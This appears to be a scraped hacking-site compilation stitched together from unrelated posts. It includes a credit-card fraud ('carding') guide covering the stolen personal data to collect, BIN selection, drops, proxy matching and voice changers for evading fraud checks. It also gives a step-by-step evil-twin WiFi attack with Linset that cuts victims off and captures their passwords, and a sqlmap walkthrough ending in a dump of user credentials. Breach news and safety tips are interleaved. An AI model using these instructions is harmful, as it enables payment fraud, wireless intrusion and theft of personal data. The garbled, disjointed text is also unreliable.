Date Of Birth (DOB):
Mother’s Maiden Name (MMN):
with the Help of this Info, You can Even Card C2IT and Even Paypal. So this is Great if you’ll get these Details too.
Full-Info Credit Card
This Card Provides you full Details in it. These Details are Below
BANK ACCOUNT NUMBER:
ROUTING NUMBER:
BANK NAME:
BANK NUMBER:
DRIVERS LICENSE NUMBER:
PIN NUMBER (For CC or ATM card)
If you’ll have this info, You can Card Anything. Yes, I said Anything.
Types of Credit Cards
Below are some of the Companies, Which Provides Credit Cards. I must Suggest you Use AMEX Premium, As It has mainly Usage by Many of the Carders. These Companies are
AMEX
VISA
DISCOVER
MasterCard
BIN- What is It?
BIN Stands for Bank Identification Number, It is the First 6 Digits of your Credit Card, Suppose if your Credit card number is 4305873969346315 this, Then your BIN will be 430587. I will suggest you Collect some Information Related to BIN, This may help you in Learning Carding Easily. For BIN’s Bins.Pro And BinLists are Best. This will help you in Learning Almost Everything about Bins. Must Do a check at these sites.
More than a year after patches were released to thwart powerful NSA exploits that leaked online, hundreds of thousands of computers are unpatched and vulnerable.
First they were used to spread ransomware. Then it was cryptocurrency mining attacks. Now, researchers say that hackers are using the leaked tools to create an even bigger malicious proxy network.
New findings from security giant Akamai say that the previously reported UPnProxy vulnerability, which abuses the common Universal Plug and Play network protocol, can now target unpatched computers behind the router’s firewall.
What is WifiSlax and Why WifiSlax?
Wifislax is one of the best Spanish Linux Operating systems. It is one of the most famous operating systems for wifi hacking, to be precise this Linux based operating system is for hacking wifi networks. WifiSlax has all inbuilt tools required to hack wifi, of course, linset as well. So for this tutorial, I am using WifiSlax.
Step 1: Install WifiSlax in Flash Drive or Pendrive using universal USB installer
Step 2: Start WifiSlax
1) Click on “Change To English Menu".
2) Click on “Run with SMP Kernel”
3) Click on “WifiSlax with KDE Desktop
4) That’s it WifiSlax will start now.
Step 3: Go to WifiSlax à WPA à Linset (Evil Twin Attack)
Step 4: Linset will Start required Tolls
Step 5: Select Wlan0
Step 6: type “1” to select Wlan0
Step 7: Enter “1” to select “todos los canales” which means select all channels. We need to search all channels to get all the networks available near you. If you want to hack a particular network whose channel number you know already, select 2 and proceed.
Step 8: All the Available networks will be shown now, wait for 2-3 mins to complete the search and click “CTRL +C” To stop the search
Step 9: Select the network that you want to hack from the list
Step 10: Enter the number of the network that you want to hack, in my case, I am hacking my own network which is “Virus” and is located at number 5
Step 11: Now we need to select hostpad, so type “1”
Step 12: We need to enter the path of the handshake, there is no need to enter any address, by default it takes some root/micaprura.cap, so just Hit “Enter” without typing anything.
Step 13: We are going to capture handshake using aircrack-ng, so enter “1
Step 14: We need to deactivate the process after the handshake is created, so we need to select “realizardesaut. masiva al ap objetivo” that is “1”
Step 15: Now Handshake capturing process will start, and 2 windows will open. we need to wait until the handshake is created. You need to capture handshake compulsorily to proceed.
Step 16: After the Handshake is captured, close the de authentication box
Step 17: Select “Si” which means “Yes”. So, Enter “1”
Step 18: Select “Interface Web Nutra”. So, Enter “1”
Step 19: Select your Language, I am Selecting “English” as the content in my country is displayed in English. You can choose accordingly and enter the number
Step 20: Now the main process will start DHCP, fake DNS, AP, deauth all, and wifi info dialog boxes will open. You need to wait until the client is connected to our network.
Step 21: Check out for active clients. The victim cannot access their internet connection until we stop the process. DHCP and deauth all will stop them from receiving any packets which make them shift to another network i.e. our fake access point or fake network signal In this process, A DOS attack is launched and the victim loses their internet connection and the victim see’s it as “Limited Connection” When you are at this step, you can even eavesdrop on the victim. you can see all the websites they surf, each and every detail is displayed in FAKE DNS
Now I will show you what happens when the process is started Original network gets disconnected and our newly created fake network with the same name connects to victim’s network and a page pop’s up
Unless the victim enters the password, they can neither access the internet nor move away from the page.
After Victim enters the password, they can get access to their old network.
Step 22: After the victim enters the password it will be immediately shown in our window.
So, this is how we easily decrypt any type of wifi password using dual Evil attack or false access point method. As it works without a list of words and without reaver, this is one of the best methods available to hack wifi WPA / wap2 – enabled wps and even blocked networks.
Guys this method is personally practiced a lot of times. So if you wanna hack through this method keep patience and read full tutorial.
DISCLAIMER: This tutorial is purely for educational purpose Hackempire is not responsible for any blackhat act of any subscriber.With that said lets start the tut.
Sql injection: SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS).
Types of Sql injection.
1-Union-Based SQL Injection
It is the most popular type of SQL injection. This type of attack uses the UNION statement, which is the integration of two select statements, to obtain data from the database.
2-Error-Based SQL Injection
An error-based SQL injection is the simplest type; but, the only difficulty with this method is that it runs only with MS-SQL Server. In this attack, we cause an application to show an error to extract the database. Normally, you ask a question to the database, and it responds with an error including the data you asked for.
3-Blind SQL Injection
The blind SQL injection is the hardest type. In this attack, no error messages are received from the database; hence, we extract the data by asking questions to the database. The blind SQL injection is further divided into two kinds:
a. Boolean-based SQL injection
b. Time-based SQL injection
The above techniques can be used to obtain the data in the database by either asking a question or inducing a time delay.
in this tut we perform sql injection with sqlmap a tool in kali linux. lets start..
commands are enclosed in sqaure bracket []
Boot into your Kali linux machine. Start a terminal, and type -
[ sqlmap -h ]
It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple command
sqlmap -u <URL to inject>. In our case, it will be-
[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 ]
So first we will get the names of available databases. For this we will add --dbs to our previous command. The final result will look like -
[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs ]
So lets say there are two databases acuart and information_schema.
we get tables of a particular database.So, now we will specify the database of interest using -D and tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-
[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables ]
This should list all available tables in the particular database.
Now we we get columns which usually contain the data of our interest, this data could be login credential,credit card info,and most important admin login used for shell upload and site defacement.
Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now.
The final command must be something like-
[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns ]
This should list all available columns in the particular table. Now the rest is to dump the sensitive data from the database.
Now we will be getting data from multiple columns. As usual, we will specify the database with -D, table with -T, and column with -C. We will get all data from specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.
[ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump ]
SO that's it.
1. Use socks5 ( dont use socks4 or http proxies as they might leak DNS info) which match the cardholder’s billing address.
2. If your CC is from UK, try to use a UK drop and so on for other countries
3. If the gift option is there, put it so it looks like you are shipping a gift to some friend, girlfriend etc.
4. Try to make orders before holidays like valentines etc. Now this is an old trick but it works for 2 reasons. The shops get many orders these days, so they can pass your fraud one as legitimate too. And it looks like you are sending a legit gift
5. For your security, use cracked/open wifi + changed MAC, VPN in some offshore country + 2-3 socks in a virtual machine. I suggest VMWare and do download a ready made image so just open it. Try to create a proxy chain for your own security, with the last external IP being the one to match cardholders address.
6. Use Firefox in private mode with extensions. Find some security related extensions which dont track your links, clear cookies, LSO & flash cookies, etc. Be creative and explore.
7. Use gmail/hotmail/yahoo when ordering or Use @some hipster email provider, one which is not really used by a lot of people. It makes it look legit.
8. If your card holder is John Jones, use email which is similar to his name.
Have a ready VoIP account and call the shop if they have to confirm information. Usually they only ask about CC info and shipping adress. You dont want to call them with a man voice when CC is a female’s, do you ? Use voice changers instead. Do this even when confirming orders for man CCs, to mask your identity.
9. Checking CCs before making purchase is highly discouraged as most checkers flag/kill cc. Try this on your own risk.
10. Check BIN before trying order. If it is credit platinum, chances are you can buy a fuckton of things. If its debit classic, good luck with that.
11. There are some services that offer DOB and SSN checks. You might want to use them if you dont have fullz.
12. Try to use different sites and your own tuts in differenet Ways. However, dont be lazy because laziness in carding can cost you badly.
13. Dont tell anyone, dont show off. (My Rule), Real Carder likes to earn silently
Even when new security systems are being deployed, hackers always seem to be a step ahead. This is evident in the hundreds of cyber-attacks and data breaches that occurred this year. To make you aware of the potential risks, let’s take a look at some of the biggest hacker attacks of 2018.
🔴Grid hacking: It has been reported that Russian hackers have been trying to infiltrate the US electrical grid system since a long time. However, the same was officially acknowledged by US government in 2018. It’s a scary scenario, as some reports even stated that Russian hackers may have acquired control of grid systems of US power companies. Even today, Russian hackers are said to be working to find weak spots in US electrical grid system.
🔴Spearfishing emails: The United States Department of Justice (DoJ) reported that around 300 universities in US and aboard were targeted by Iranian hackers. Nine of the Iranian hackers have been indicted by DoJ. Around 31 TB of data was stolen by the hackers, which is valued at around $3 billion. The hackers used spearphishing emails to trick people into revealing their personal data.
🔴Data exposure: Data breach is when hackers forcefully infiltrate a protected system, whereas data exposure occurs when users or administrators accidently fail to secure a database or other storage mechanism. This can occur due to an oversight or simply forgetting to follow the mandated security protocol. One major case involving data exposure occurred at Exactis, which is a marketing and data aggregation firm. Around 350 million records were exposed, which may have been accessed by hackers.
🔴Mobile app data breach: Hackers were able to infiltrate Under Armour’s MyFitnessPal app, resulting in data breach affecting 150 million users. Hackers were able to steal email addresses, usernames and passwords. Even though birth dates and credit card details were safe, it was still considered a major data breach. It is possible that hackers may have been able to crack some of the encrypted confidential data.
🔴VPNFilter malware: Russian hackers targeted routers on a global scale, compromising around 500,000 routers in the process. A malware named VPNFilter was used to carry out the attack. The malware takes control of the router and utilizes all compromised routers to create a massive botnet. This can subsequently be used to carry out other types of cyber-attacks such as stealing data, spam campaigns, and network manipulations. Various popular routers were found to be infected such as D-Link, Netgear, Huawei, TP-Link, ASUS and Linksys.
There’s danger lurking at every step, so make sure you follow security guidelines when using internet. Always have anti-virus software installed and updated and do not click on unknown links or emails.
